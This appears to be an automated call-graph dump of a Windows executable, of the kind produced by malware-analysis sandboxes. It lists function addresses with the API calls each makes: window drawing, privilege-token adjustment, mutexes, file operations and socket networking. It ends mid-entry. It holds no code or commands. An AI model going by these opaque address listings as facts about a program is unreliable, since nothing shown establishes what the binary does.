1b1e39 __EH_prolog3 79083->79084 79094 16ba90 79084->79094 79091 1b1eb1 79092 1b1ef2 SetWindowPos 79091->79092 79093 1b1f0d std::_Locinfo::_Locinfo ctype 79092->79093 79095 16baa5 79094->79095 79096 16ba9b 79094->79096 79098 16cf00 79095->79098 79106 16dfb0 InitializeCriticalSection RaiseException std::_String_base::_Xlen __CxxThrowException@8 79096->79106 79099 16cf25 GetWindowTextW 79098->79099 79100 16cf1d 79098->79100 79102 17d354 79099->79102 79107 16cf60 69 API calls 2 library calls 79100->79107 79104 17d360 _wcsnlen 79102->79104 79108 16cf30 79104->79108 79106->79095 79107->79099 79109 16cf38 79108->79109 79110 16cf3f GetDC GetWindowRect 79109->79110 79113 16dfb0 InitializeCriticalSection RaiseException std::_String_base::_Xlen __CxxThrowException@8 79109->79113 79110->79091 79112 16cf57 79113->79112 79114 1b2322 79117 1b2167 79114->79117 79116 1b2346 79118 1b2179 79117->79118 79128 1b219a 79117->79128 79119 1b2181 79118->79119 79120 1b21b6 79118->79120 79147 1b20a9 79119->79147 79121 1b21bd 79120->79121 79122 1b21dc 79120->79122 79182 1b1458 IsWindow IsWindowVisible PostMessageW InvalidateRect 79121->79182 79123 1b21e3 79122->79123 79124 1b21f1 79122->79124 79173 1b1513 IsWindow 79123->79173 79126 1b21f8 79124->79126 79127 1b2217 79124->79127 79177 1b14af IsWindow 79126->79177 79129 1b221e 79127->79129 79130 1b2240 79127->79130 79128->79116 79183 1b156b InvalidateRect 79129->79183 79132 1b2269 79130->79132 79133 1b2247 79130->79133 79136 1b2270 79132->79136 79140 1b2292 79132->79140 79184 1b1304 _TrackMouseEvent 79133->79184 79135 1b21da 79135->79128 79185 1b158c InvalidateRect 79136->79185 79143 1b22dc 79140->79143 79186 1b15b4 IsWindowEnabled LoadCursorW SetCursor 79140->79186 79144 1b22f9 79143->79144 79187 1b1894 InvalidateRect 79143->79187 79144->79128 79188 1b18a4 InvalidateRect 79144->79188 79148 1b20b8 __EH_prolog3_GS 79147->79148 79189 197451 79148->79189 79152 1b20f8 79195 1a6537 GetWindowRect 79152->79195 79155 1b2130 79159 1b213f 79155->79159 79160 1b2135 79155->79160 79156 1b2117 79157 1b2129 79156->79157 79158 1b2122 79156->79158 79210 1b1a42 79157->79210 79197 1b1f15 79158->79197 79164 1b2127 79159->79164 79225 1b1d08 79159->79225 79237 1b1b7b 84 API calls 4 library calls 79160->79237 79238 197395 DeleteObject BitBlt SelectObject DeleteDC ctype 79164->79238 79165 1b213d 79165->79164 79168 1b2157 79239 19747c EndPaint 79168->79239 79174 1b1535 PostMessageW 79173->79174 79175 1b1554 InvalidateRect 79173->79175 79174->79175 79176 1b1568 79175->79176 79176->79128 79178 1b14f9 InvalidateRect 79177->79178 79179 1b14cd IsWindowEnabled 79177->79179 79181 1b150f 79178->79181 79179->79178 79180 1b14da PostMessageW 79179->79180 79180->79178 79181->79128 79182->79135 79183->79128 79184->79128 79185->79128 79186->79140 79187->79144 79188->79128 79190 197469 BeginPaint 79189->79190 79191 197474 GetClientRect 79189->79191 79190->79191 79192 197323 CreateCompatibleDC 79191->79192 79243 196393 CreateCompatibleBitmap 79192->79243 79194 19736a SelectObject SetViewportOrgEx 79194->79152 79196 1a6560 79195->79196 79196->79155 79196->79156 79244 1e5421 79197->79244 79199 1b1f21 IsWindowEnabled 79200 1b1f32 GetClientRect 79199->79200 79282 1e5421 79210->79282 79212 1b1a4e IsWindowEnabled 79213 1b1a68 GetClientRect 79212->79213 79226 1b1d14 __EH_prolog3 79225->79226 79227 16ba90 std::_String_base::_Xlen 2 API calls 79226->79227 79228 1b1d3a 79227->79228 79237->79165 79238->79168 79243->79194 79244->79199 79282->79212 79290 5f4ea873 79291 5f4ea885 79290->79291 79292 5f4ea8a1 GetAdaptersInfo 79291->79292 79294 5f4ea89d 79291->79294 79293 5f4ea8bc 79292->79293 79292->79294 79293->79294 79295 5f4ea8fc GetTickCount 79293->79295 79296 5f4ea917 79295->79296 79298 5f4ea936 79296->79298 79299 5f52b8e5 __output_l __flsbuf __getptd_noexit __lseeki64 79296->79299 79298->79294 79299->79296 79300 17bba9 79409 1b03a0 79300->79409 79410 1b03af __EH_prolog3 79409->79410 79411 16ba90 std::_String_base::_Xlen 2 API calls 79410->79411 79412 1b03bd 79411->79412 79413 16ba90 std::_String_base::_Xlen 2 API calls 79412->79413 79414 1b03ca 79413->79414 79415 16bf10 78 API calls 79414->79415 79416 1b03db 79415->79416 79417 16bf10 78 API calls 79416->79417 79418 1b03e6 79417->79418 79751 1afd5a 79418->79751 79752 1afd66 __EH_prolog3 79751->79752 79825 1a65fa 79752->79825 79826 1a6606 __EH_prolog3 79825->79826 79827 1ca3f4 2 API calls 79826->79827 79828 1a6622 79827->79828 79829 1ca3f4 2 API calls 79828->79829 79830 1a662e 79829->79830 79831 16ba90 std::_String_base::_Xlen 2 API calls 79830->79831 81489 1c895e InternetGetConnectedState 81490 1c8972 81489->81490 81491 1c8978 81490->81491 81494 1c88eb 69 API calls 2 library calls 81490->81494 81493 1c8982 81494->81493 81495 184c5a 81496 184c68 TlsGetValue 81495->81496 81497 184c64 81495->81497 81496->81497 81500 183dcb 81497->81500 81499 184c83 81501 183dd7 __EH_prolog3 81500->81501 81502 181e07 RaiseException 81501->81502 81503 183de1 81502->81503 81504 17dd3e 2 API calls 81503->81504 81505 183dfb 81504->81505 81506 182a00 3 API calls 81505->81506 81507 183e03 std::_Locinfo::_Locinfo ctype 81506->81507 81507->81499 81508 1cbd58 CreateMutexW 81509 1cbd75 GetLastError 81508->81509 81510 1cbdc1 81508->81510 81511 1cbda2 EnterCriticalSection 81509->81511 81512 1cbd82 CloseHandle FindWindowW 81509->81512 81515 1cbc34 76 API calls 81511->81515 81512->81510 81514 1cbdb9 LeaveCriticalSection 81514->81510 81515->81514 81516 5f4da40a 81523 5f4d7a1f GetCurrentProcess OpenProcessToken 81516->81523 81520 5f4da432 81521 5f4da436 81520->81521 81522 5f52ac74 403 API calls 81520->81522 81522->81521 81524 5f4d7a4b GetLastError 81523->81524 81525 5f4d7a53 LookupPrivilegeValueW 81523->81525 81530 5f4d7ac5 81524->81530 81526 5f4d7a65 CloseHandle 81525->81526 81527 5f4d7a70 AdjustTokenPrivileges 81525->81527 81526->81524 81528 5f4d7aa9 CloseHandle GetLastError 81527->81528 81529 5f4d7ab7 CloseHandle 81527->81529 81528->81530 81529->81530 81531 5f4d888b __EH_prolog3_catch 81530->81531 81533 5f4d88a6 81531->81533 81532 5f4d88b5 __CxxThrowException 81532->81533 81533->81532 81534 5f4d8914 CreateWaitableTimerW 81533->81534 81535 5f4d893d SetWaitableTimer 81534->81535 81536 5f4d8927 GetLastError 81534->81536 81537 5f4d896f CreateMutexW 81535->81537 81538 5f4d8959 GetLastError 81535->81538 81536->81532 81539 5f4d897f GetLastError 81537->81539 81540 5f4d8995 CreateSemaphoreW 81537->81540 81538->81532 81539->81532 81541 5f4d89ac GetLastError 81540->81541 81542 5f4d89c2 CreateSemaphoreW 81540->81542 81541->81542 81543 5f4d89e7 CreateEventW 81542->81543 81544 5f4d89d1 GetLastError 81542->81544 81545 5f4d89fc GetLastError 81543->81545 81546 5f4d8a12 CreateEventW 81543->81546 81544->81543 81545->81546 81547 5f4d8a21 GetLastError 81546->81547 81548 5f4d8a37 81546->81548 81547->81548 81548->81520 81572 1a68d3 81573 1a68dc 81572->81573 81577 1a68fc ctype 81572->81577 81573->81577 81578 1a6817 InternetGetConnectedState 81573->81578 81575 1a68eb 81576 1a683d 8 API calls 81575->81576 81575->81577 81576->81577 81579 1a682b 81578->81579 81580 1a6831 81579->81580 81583 1a67a4 69 API calls 2 library calls 81579->81583 81580->81575 81582 1a683b 81582->81575 81583->81582 81584 18ddd1 81588 18dde3 _memset 81584->81588 81585 18ddfb 81586 1e4647 _strlwr_s_l_stat 5 API calls 81585->81586 81587 18de83 81586->81587 81588->81585 81589 1e573e __wsplitpath_helper 67 API calls 81588->81589 81590 18de34 _wcslen 81589->81590 81591 18de4d SHFileOperationW 81590->81591 81591->81585 81592 1967d0 PostMessageW 81593 5f527d19 81594 5f527d2b 81593->81594 81595 5f527d44 _memset 81594->81595 81596 5f527d82 81594->81596 81600 5f51fcc6 81595->81600 81598 5f527d94 WSAGetLastError 81598->81596 81601 5f51fce2 recvfrom 81600->81601 81602 5f51fccf 81600->81602 81601->81602 81602->81596 81602->81598 81603 18ead4 81604 18eaf9 81603->81604 81610 199590 81604->81610 81613 1b74a9 81604->81613 81605 18eb5e SetWindowLongW 81607 18eb50 81605->81607 81606 18eb18 81606->81605 81606->81607 81616 199245 81610->81616 81612 1995b4 81612->81606 82158 1b72a9 81613->82158 81615 1b74cd 81615->81606 81617 199258 81616->81617 81645 1992bb 81616->81645 81618 19928d 81617->81618 81619 1992c2 81617->81619 81666 198f5a GetWindowLongW GetWindowLongW 81618->81666 81620 1992e9 81619->81620 81621 1992ca 81619->81621 81622 199361 81620->81622 81623 1992f1 81620->81623 81722 197656 9 API calls _strlwr_s_l_stat 81621->81722 81624 19936a 81622->81624 81625 199383 81622->81625 81631 199328 81623->81631 81632 19931f 81623->81632 81623->81645 81725 196727 224 API calls 81624->81725 81627 19938c 81625->81627 81628 1993a7 81625->81628 81705 1991eb 81627->81705 81637 1993cd 81628->81637 81638 1993e1 81628->81638 81628->81645 81630 1992aa 81630->81645 81733 197dff 24 API calls 81630->81733 81631->81630 81636 199332 81631->81636 81723 1959be 154 API calls 81632->81723 81724 198edf 90 API calls 81636->81724 81716 196659 IsWindowVisible 81637->81716 81642 19941b 81638->81642 81643 199407 81638->81643 81638->81645 81640 19937e 81640->81630 81648 199424 81642->81648 81651 19943b 81642->81651 81726 198f3b 159 API calls 81643->81726 81644 199339 81644->81645 81645->81612 81727 195c31 8 API calls 81648->81727 81650 199480 81653 1994ae 81650->81653 81658 19947b 81650->81658 81655 19944d 81651->81655 81728 19800a 74 API calls 81651->81728 81661 1994d4 81653->81661 81731 1982da 7 API calls 81653->81731 81654 19945a 81729 196560 IsWindow IsWindow IsWindowVisible PostMessageW PostMessageW 81654->81729 81655->81650 81655->81654 81658->81650 81730 195a41 IsWindow IsWindow IsWindowVisible PostMessageW 81658->81730 81659 1994a9 81659->81653 81662 1994f1 81661->81662 81719 19662b 81661->81719 81662->81630 81663 19954a 81662->81663 81732 198061 104 API calls __EH_prolog3_GS 81663->81732 81734 197927 81666->81734 81669 16ba90 std::_String_base::_Xlen 2 API calls 81670 198fdc 81669->81670 81671 16bf10 78 API calls 81670->81671 81672 198ff1 SetWindowTextW 81671->81672 81706 1991f8 81705->81706 81709 199226 81705->81709 81707 199202 GetTickCount 81706->81707 81715 199224 81706->81715 81708 17b9b4 86 API calls 81707->81708 81710 199216 81708->81710 81709->81715 81963 198e84 156 API calls 81709->81963 81913 1d5385 81710->81913 81715->81645 81717 196669 Shell_NotifyIconW 81716->81717 81718 196678 81716->81718 81717->81718 81718->81645 81720 196639 KillTimer PostMessageW 81719->81720 81721 196655 81719->81721 81720->81721 81721->81662 81722->81630 81723->81645 81724->81644 81725->81640 81726->81645 81727->81644 81728->81655 81729->81658 81730->81659 81731->81661 81732->81645 81733->81645 81735 197938 GetWindowLongW 81734->81735 81737 19795a 81735->81737 81738 197966 81735->81738 81863 18d5cf GetWindowLongW SetWindowLongW SetWindowPos 81737->81863 81740 19799d GetDlgItem IsWindow 81738->81740 81855 1962fa GetWindowLongW 81738->81855 81742 1979b8 81740->81742 81743 1979d2 81740->81743 81742->81743 81748 1979ca 81742->81748 81859 195ea9 81743->81859 81747 19798e SendMessageW 81747->81740 81864 196019 DestroyWindow 81748->81864 81749 197a18 GetDlgItem IsWindow 81751 197a36 81749->81751 81752 197aca 81749->81752 81865 195fc7 CreateWindowExW 81751->81865 81754 197add GetClientRect 81752->81754 81755 197aee GetWindowRect 81752->81755 81760 197aff 81752->81760 81754->81760 81755->81760 81756 197a63 IsWindow 81756->81752 81758 197a6c GetWindowRect MapWindowPoints 81756->81758 81757 197b7a GetDlgItem GetWindowRect MapWindowPoints 81757->81760 81866 196fe3 75 API calls 2 library calls 81758->81866 81759 197bfe SetWindowLongW SetWindowLongW 81759->81669 81760->81757 81760->81759 81867 195ec6 RaiseException 81760->81867 81868 196fe3 75 API calls 2 library calls 81760->81868 81856 19631b SetWindowLongW 81855->81856 81857 196317 SendMessageW 81855->81857 81856->81857 81858 196330 SetWindowPos 81856->81858 81857->81740 81857->81747 81858->81857 81860 195eb8 GetClientRect 81859->81860 81861 195eb2 81859->81861 81860->81749 81860->81752 81862 1e49fc __mtinitlocknum 67 API calls 81861->81862 81862->81860 81863->81738 81864->81743 81865->81756 81866->81752 81867->81760 81868->81760 81914 1d5391 __EH_prolog3 81913->81914 81915 16ba90 std::_String_base::_Xlen 2 API calls 81914->81915 81916 1d53a0 81915->81916 81917 17cc03 69 API calls 81916->81917 81918 1d53bb 81917->81918 81963->81715 82159 1b72bb 82158->82159 82187 1b72e1 82158->82187 82160 1b7411 82159->82160 82161 1b72d0 82159->82161 82162 1b7439 82160->82162 82163 1b7419 82160->82163 82164 1b72da 82161->82164 82165 1b72e9 82161->82165 82166 1b745b 82162->82166 82167 1b7442 82162->82167 82240 1b6f7f CreateSolidBrush 82163->82240 82258 1b6c41 118 API calls 4 library calls 82164->82258 82169 1b72fc 82165->82169 82170 1b72f3 82165->82170 82174 1b7464 82166->82174 82188 1b7478 82166->82188 82267 1b5e20 80 API calls 5 library calls 82167->82267 82171 1b730f 82169->82171 82172 1b7306 82169->82172 82259 1b6d32 121 API calls 4 library calls 82170->82259 82178 1b7319 82171->82178 82179 1b7322 82171->82179 82260 1b6dd6 127 API calls 4 library calls 82172->82260 82268 1b5cff 81 API calls 4 library calls 82174->82268 82261 1b71b5 218 API calls 82178->82261 82185 1b732c 82179->82185 82186 1b7335 82179->82186 82181 1b737a 82181->82187 82264 1b5b3b 26 API calls 82181->82264 82182 1b730d 82182->82187 82262 1b6ae2 121 API calls 5 library calls 82185->82262 82190 1b7348 82186->82190 82191 1b733f 82186->82191 82187->81615 82188->82181 82269 1b510b GetDlgCtrlID SetBkColor 82188->82269 82193 1b7358 82190->82193 82197 1b73df 82190->82197 82263 1b5aae 87 API calls 4 library calls 82191->82263 82201 1b639a 82193->82201 82195 1b73a0 82195->82187 82265 1b55b0 16 API calls __EH_prolog3_GS 82195->82265 82197->82181 82199 1b7404 82197->82199 82266 1b5bf0 89 API calls 4 library calls 82199->82266 82202 1b63be __EH_prolog3 82201->82202 82203 1b63d0 GetDlgItem 82202->82203 82226 1b6579 ctype 82202->82226 82204 1b63e9 _memset 82203->82204 82203->82226 82207 1b63fe GetWindowTextW 82204->82207 82205 1e4647 _strlwr_s_l_stat 5 API calls 82206 1b659c 82205->82206 82206->82181 82208 16ba90 std::_String_base::_Xlen 2 API calls 82207->82208 82209 1b6421 IsWindowVisible 82208->82209 82210 1b645a 82209->82210 82211 1b643e SendMessageW 82209->82211 82211->82210 82226->82205 82360 1b65a6 82240->82360 82258->82187 82259->82187 82260->82182 82261->82187 82262->82182 82263->82187 82264->82195 82265->82187 82266->82187 82267->82187 82268->82187 82269->82181 82361 1b65b2 __EH_prolog3 82360->82361 82362 1b65c7 GetDlgItem 82361->82362 82476 1af7d0 82362->82476 82365 1b5f33 78 API calls 82366 1b65f1 82365->82366 82367 1b3197 70 API calls 82366->82367 82368 1b6600 ctype 82367->82368 82369 1b6652 GetDlgItem 82368->82369 82477 1af7d9 82476->82477 82478 1777af 18 API calls 82477->82478 82479 1af7e5 82478->82479 82480 1af7e9 82479->82480 82481 1af7ed SetWindowLongW 82479->82481 82480->82365 82481->82480 82518 1829d7 82519 1829e1 82518->82519 82520 1829e5 TlsGetValue 82518->82520 82523 1816e2 82519->82523 82520->82519 82524 1816f7 82523->82524 82527 181709 82523->82527 82530 17de82 __VEC_memcpy ___sbh_free_block 82524->82530 82526 1817cb 82527->82526 82528 18174e GetTickCount 82527->82528 82529 18175f 82528->82529 82529->82526 82530->82527 82531 1a3f4a 82532 1a3f68 GetWindowLongW 82531->82532 82533 1a3f55 82531->82533 82541 1a3ee0 CallWindowProcW 82532->82541 82540 1a3ee0 CallWindowProcW 82533->82540 82536 1a3f63 82537 1a3f87 82537->82536 82538 1a3f95 GetWindowLongW 82537->82538 82538->82536 82539 1a3fa2 SetWindowLongW 82538->82539 82539->82536 82540->82536 82541->82537 82542 17adc4 82553 1e5421 82542->82553 82544 17ade8 GetModuleFileNameW 82545 16ba90 std::_String_base::_Xlen 2 API calls 82544->82545 82546 17ae06 82545->82546 82547 16bf10 78 API calls 82546->82547 82548 17ae17 82547->82548 82554 17995e 82548->82554 82550 17ae24 ctype 82551 1e4647 _strlwr_s_l_stat 5 API calls 82550->82551 82552 17ae4d 82551->82552 82553->82544 82555 17996a __EH_prolog3_catch 82554->82555 82574 1774b2 CLSIDFromProgID 82555->82574 82559 179ae4 82585 1775a2 CLSIDFromProgID 82559->82585 82562 179b11 SysFreeString 82567 1799a1 std::_Locinfo::_Locinfo 82562->82567 82563 177feb 4 API calls 82565 179a80 SysFreeString 82565->82567 82567->82550 82575 1774ef 82574->82575 82576 1774db CoCreateInstance 82574->82576 82577 1e4647 _strlwr_s_l_stat 5 API calls 82575->82577 82576->82575 82578 1774fb 82577->82578 82578->82567 82579 177feb 82578->82579 82580 17801b 82579->82580 82581 177ff9 SysFreeString 82579->82581 82580->82559 82580->82565 82581->82580 82582 178004 SysAllocString 82581->82582 82582->82580 82583 178011 82582->82583 82590 16dfb0 InitializeCriticalSection RaiseException std::_String_base::_Xlen __CxxThrowException@8 82583->82590 82586 1775df 82585->82586 82587 1775cb CoCreateInstance 82585->82587 82588 1e4647 _strlwr_s_l_stat 5 API calls 82586->82588 82587->82586 82589 1775eb 82588->82589 82589->82562 82589->82563 82590->82580 82591 5f4db995 82596 5f4db3f0 82591->82596 82593 5f4db9a4 82594 5f4db9b0 82593->82594 82630 5f4da564 82593->82630 82597 5f4db402 82596->82597 82598 5f4db440 _memset 82597->82598 82610 5f4db547 82597->82610 82603 5f4db460 82598->82603 82599 5f4db714 inet_addr 82601 5f4db731 gethostbyname 82599->82601 82604 5f4db83c _memset 82601->82604 82609 5f4db76d 82601->82609 82603->82599 82606 5f4db5f9 _memset 82603->82606 82603->82610 82616 5f4db49c 82603->82616 82605 5f4db85e 82604->82605 82650 5f513d26 MultiByteToWideChar MultiByteToWideChar 82605->82650 82608 5f4db61d 82606->82608 82647 5f513d26 MultiByteToWideChar MultiByteToWideChar 82608->82647 82609->82604 82615 5f4db814 inet_addr 82609->82615 82609->82616 82610->82593 82611 5f4db875 82618 5f4db889 82611->82618 82651 5f4eba20 __EH_prolog3 __EH_prolog3_GS 82611->82651 82614 5f4db637 82619 5f4db673 gethostbyname 82614->82619 82623 5f513f0c 13 API calls 82614->82623 82648 5f513d67 __snwprintf 82614->82648 82615->82604 82615->82616 82633 5f523cfe 82616->82633 82636 5f5225d6 82616->82636 82652 5f4eba20 __EH_prolog3 __EH_prolog3_GS 82618->82652 82619->82616 82626 5f4db694 82619->82626 82623->82614 82624 5f4db6fe 82624->82616 82626->82616 82626->82624 82627 5f513f0c 13 API calls 82626->82627 82649 5f513d67 __snwprintf 82626->82649 82627->82626 82631 5f4da56d FreeLibraryAndExitThread 82630->82631 82632 5f4da576 82630->82632 82631->82632 82632->82594 82653 5f527b9f _memset 82633->82653 82635 5f523d12 82635->82610 82637 5f5225e1 82636->82637 82638 5f522637 82636->82638 82641 5f528425 9 API calls 82637->82641 82639 5f528425 9 API calls 82638->82639 82640 5f52263e 82639->82640 82642 5f521cb9 11 API calls 82640->82642 82643 5f5225f6 82641->82643 82646 5f522634 ctype 82642->82646 82644 5f522610 htonl 82643->82644 82645 5f521cb9 11 API calls 82644->82645 82645->82646 82646->82610 82647->82614 82648->82614 82649->82626 82650->82611 82651->82618 82652->82616 82654 5f51c780 10 API calls 82653->82654 82655 5f527bf1 82654->82655 82655->82635 82656 5f51e488 82658 5f51e4af 82656->82658 82657 5f51e707 DefWindowProcW 82674 5f51e4c7 ctype 82657->82674 82658->82657 82659 5f51e4e1 82658->82659 82660 5f51e4ee 82658->82660 82658->82674 82683 5f51e190 __EH_prolog3 82659->82683 82661 5f51e507 82660->82661 82662 5f51e4f6 82660->82662 82665 5f51e586 82661->82665 82666 5f51e50f _memset 82661->82666 82773 5f51df0e __EH_prolog3 std::runtime_error::runtime_error __CxxThrowException 82662->82773 82668 5f51e601 82665->82668 82673 5f51e5c7 82665->82673 82665->82674 82667 5f51e545 82666->82667 82691 5f51e39f 82667->82691 82670 5f51e609 82668->82670 82671 5f51e65f 82668->82671 82670->82674 82675 5f51e61b _memset 82670->82675 82672 5f51e667 82671->82672 82677 5f51e6b4 82671->82677 82672->82674 82676 5f51e67d _memset 82672->82676 82673->82674 82698 5f50ae39 GetTickCount 82673->82698 82678 5f522b06 9 API calls 82675->82678 82705 5f527104 82675->82705 82751 5f51fe51 82676->82751 82754 5f507a33 __EH_prolog3 82676->82754 82677->82657 82677->82674 82678->82674 82684 5f51c56b 82683->82684 82685 5f51e1a3 GetTickCount 82684->82685 82686 5f51e1b1 82685->82686 82774 5f4df7ae 82686->82774 82688 5f51e1cf 82689 5f51e2fd ctype 82688->82689 82778 5f5268ec __EH_prolog3 82688->82778 82689->82674 82827 5f52074a 82691->82827 82693 5f51e425 82693->82674 82694 5f51e3bc 82695 5f51e3e1 82694->82695 82849 5f51dc19 __EH_prolog3 std::runtime_error::runtime_error __CxxThrowException 82694->82849 82695->82693 82697 5f51e410 closesocket 82695->82697 82697->82693 82697->82695 82700 5f50ae63 82698->82700 82699 5f50aec0 82699->82674 82700->82699 82890 5f51fe29 82700->82890 82701 5f50aeac WSAGetLastError 82701->82699 82702 5f50aeb9 82701->82702 82702->82699 82703 5f507556 21 API calls 82702->82703 82703->82699 82706 5f52711b 82705->82706 82741 5f52717d ctype 82705->82741 82707 5f527122 GetTickCount 82706->82707 82708 5f527182 GetTickCount 82706->82708 82709 5f5272b2 GetTickCount 82706->82709 82710 5f527447 ctype 82706->82710 82711 5f52738f ctype 82706->82711 82712 5f52723c GetTickCount 82706->82712 82713 5f5273ec GetTickCount 82706->82713 82730 5f52736a 82706->82730 82706->82741 82719 5f527c17 4 API calls 82707->82719 82717 5f527171 82708->82717 82718 5f52719f 82708->82718 82742 5f5272c6 ctype 82709->82742 82716 5f527456 inet_addr htonl 82710->82716 82720 5f52739f inet_addr htonl 82711->82720 82714 5f527255 82712->82714 82715 5f527288 82712->82715 82746 5f527210 ctype 82713->82746 82723 5f513f0c 13 API calls 82714->82723 82902 5f51df88 15 API calls 82715->82902 82716->82741 82898 5f5259a7 15 API calls 82717->82898 82725 5f5271dc 82718->82725 82735 5f5271ae htons 82718->82735 82722 5f52713f 82719->82722 82720->82741 82727 5f527156 82722->82727 82732 5f513f0c 13 API calls 82722->82732 82728 5f527266 82723->82728 82900 5f5259a7 15 API calls 82725->82900 82727->82717 82897 5f523c28 17 API calls 82727->82897 82901 5f51df88 15 API calls 82728->82901 82730->82741 82904 5f50d5b5 __EH_prolog3 ctype 82730->82904 82731 5f527286 82731->82741 82903 5f523c28 17 API calls 82731->82903 82732->82727 82740 5f5271cb htons 82735->82740 82748 5f5271e0 82735->82748 82737 5f527278 82745 5f527c17 4 API calls 82737->82745 82740->82725 82740->82748 82741->82674 82893 5f525c34 __EH_prolog3 82742->82893 82743 5f527221 82747 5f527c17 4 API calls 82743->82747 82744 5f52732f 82749 5f527354 GetTickCount 82744->82749 82745->82731 82746->82741 82747->82746 82899 5f525a1f 15 API calls 82748->82899 82749->82741 82752 5f51fe57 82751->82752 82753 5f51fe5f connect 82751->82753 82752->82753 82753->82674 82755 5f507a4f 82754->82755 82758 5f507b70 82754->82758 82757 5f507a58 82755->82757 82755->82758 82756 5f507be9 82756->82674 82759 5f507a5c 82757->82759 82758->82756 82910 5f5203e4 82758->82910 82760 5f507b58 GetTickCount 82759->82760 82761 5f507a88 GetTickCount GetTickCount 82759->82761 82760->82756 82765 5f507aa8 82761->82765 82763 5f507ba8 82764 5f513f7c 13 API calls 82763->82764 82764->82756 82766 5f4eb865 5 API calls 82765->82766 82767 5f507ac7 82766->82767 82768 5f4eb865 5 API calls 82767->82768 82769 5f507add 82768->82769 82770 5f513f7c 13 API calls 82769->82770 82773->82674 82775 5f4df7c0 82774->82775 82777 5f4df7db ctype 82775->82777 82810 5f4d7c8f 12 API calls std::exception::exception 82775->82810 82777->82688 82811 5f523a17 82778->82811 82780 5f5268ff 82781 5f526908 GetTickCount 82780->82781 82782 5f526abd GetTickCount 82781->82782 82785 5f526924 82781->82785 82786 5f526c60 82782->82786 82800 5f526ac9 82782->82800 82783 5f52695b 82791 5f4db9b7 403 API calls 82783->82791 82793 5f526985 82783->82793 82784 5f526cb2 82787 5f526cd3 82784->82787 82792 5f527b9f 11 API calls 82784->82792 82785->82782 82785->82783 82788 5f4db9b7 403 API calls 82785->82788 82786->82784 82817 5f5239b9 82786->82817 82787->82688 82788->82783 82789 5f5269cb GetTickCount 82791->82793 82792->82787 82793->82789 82800->82786 82802 5f526c1b htonl 82800->82802 82809 5f526bc8 82800->82809 82804 5f4eb865 5 API calls 82802->82804 82809->82800 82822 5f523c28 17 API calls 82809->82822 82810->82777 82812 5f523a23 GetTickCount 82811->82812 82813 5f523a5b 82811->82813 82812->82813 82814 5f523a37 82812->82814 82813->82780 82814->82813 82815 5f513f0c 13 API calls 82814->82815 82816 5f523a53 82815->82816 82816->82780 82818 5f523a0a 82817->82818 82819 5f5239ca 82817->82819 82818->82784 82819->82818 82822->82809 82828 5f520767 82827->82828 82829 5f52076c WSASetLastError 82828->82829 82850 5f5205f0 __EH_prolog3 82828->82850 82834 5f52077b 82829->82834 82832 5f520787 82832->82829 82833 5f520792 82832->82833 82833->82834 82835 5f5207af socket 82833->82835 82834->82694 82836 5f5207c0 WSAGetLastError 82835->82836 82837 5f5207cb 82835->82837 82836->82834 82869 5f51fbef 82837->82869 82849->82695 82851 5f52060c GetCurrentThreadId EnterCriticalSection 82850->82851 82857 5f520604 82850->82857 82852 5f52062b 82851->82852 82853 5f52067d 82851->82853 82854 5f520673 LeaveCriticalSection 82852->82854 82859 5f528425 9 API calls 82852->82859 82855 5f528425 9 API calls 82853->82855 82854->82857 82858 5f520684 82855->82858 82857->82832 82860 5f528425 9 API calls 82858->82860 82861 5f520640 82859->82861 82862 5f520693 82860->82862 82863 5f528425 9 API calls 82861->82863 82864 5f528425 9 API calls 82862->82864 82865 5f520654 82863->82865 82866 5f520667 82864->82866 82867 5f528425 9 API calls 82865->82867 82866->82854 82881 5f5204d7 82866->82881 82867->82866 82884 5f51fa35 82869->82884 82871 5f51fbfe 82882 5f528f2e 82881->82882 82885 5f51fa43 82884->82885 82888 5f51fa64 82884->82888 82887 5f51fa55 _memset 82885->82887 82886 5f51fa6c 82886->82871 82887->82888 82888->82886 82889 5f51fac2 _memset 82888->82889 82889->82886 82891 5f51fe32 82890->82891 82892 5f51fe3b send 82890->82892 82891->82892 82892->82701 82894 5f525c51 82893->82894 82905 5f4f9f93 82894->82905 82896 5f525c69 82896->82744 82897->82717 82898->82741 82899->82746 82900->82743 82901->82737 82902->82731 82903->82746 82904->82741 82906 5f4f9fae 82905->82906 82907 5f4f9faa 82905->82907 82909 5f4d7c8f 12 API calls std::exception::exception 82906->82909 82907->82896 82909->82907 82911 5f520410 _memset inet_addr 82910->82911 82916 5f520402 82910->82916 82912 5f52047a htons 82911->82912 82913 5f520436 82911->82913 82914 5f51fe51 connect 82912->82914 82915 5f52045b WSAAsyncGetHostByName 82913->82915 82914->82916 82915->82916 82917 5f52046a WSASetLastError 82915->82917 82916->82763 82917->82916 82918 1995c0 82931 1ead5e 82918->82931 82921 1995e6 82951 1eac98 82931->82951 82933 1ead70 82933->82921 82953 1eaca4 __mtinitlocknum 82951->82953 82952 1eacb7 83000 1e98d1 67 API calls __getptd_noexit 82952->83000 82953->82952 82955 1eaced 82953->82955 82970 2018a1 82955->82970 82956 1eacbc 83001 1ea5b1 6 API calls 2 library calls 82956->83001 82959 1eacf2 82960 1eacf9 82959->82960 82961 1ead06 82959->82961 83002 1e98d1 67 API calls __getptd_noexit 82960->83002 82963 1ead2e 82961->82963 82964 1ead0e 82961->82964 82988 2015ed 82963->82988 83003 1e98d1 67 API calls __getptd_noexit 82964->83003 82968 1eaccc __mtinitlocknum @_EH4_CallFilterFunc@8 82968->82933 82971 2018ad __mtinitlocknum 82970->82971 82972 1f339f __lock 67 API calls 82971->82972 82973 2018bb 82972->82973 82974 201937 82973->82974 82985 201930 82973->82985 83008 1f32dc 67 API calls 6 library calls 82973->83008 83009 1fd2cc 68 API calls __lock 82973->83009 83010 1fd33a LeaveCriticalSection LeaveCriticalSection _doexit 82973->83010 82976 1f0596 __malloc_crt 67 API calls 82974->82976 82978 201941 82976->82978 82977 2019c5 __mtinitlocknum 82977->82959 82978->82985 83011 1fb7c4 InitializeCriticalSectionAndSpinCount __mtinitlocknum 82978->83011 82982 201966 82983 201971 82982->82983 82984 201984 EnterCriticalSection 82982->82984 82986 1e49fc __mtinitlocknum 67 API calls 82983->82986 82984->82985 83005 2019d0 82985->83005 82986->82985 82994 201610 __wopenfile 82988->82994 82990 20162a 82994->82990 83015 1e9e6c 79 API calls 2 library calls 82994->83015 83000->82956 83002->82968 83003->82968 83012 1f32ad LeaveCriticalSection 83005->83012 83007 2019d7 83007->82977 83008->82973 83009->82973 83010->82973 83011->82982 83012->83007 83106 1b5afa 83111 1b5894 83106->83111 83109 1b5b13 MoveWindow 83110 1b5b35 83109->83110 83112 1777af 18 API calls 83111->83112 83113 1b58a3 83112->83113 83114 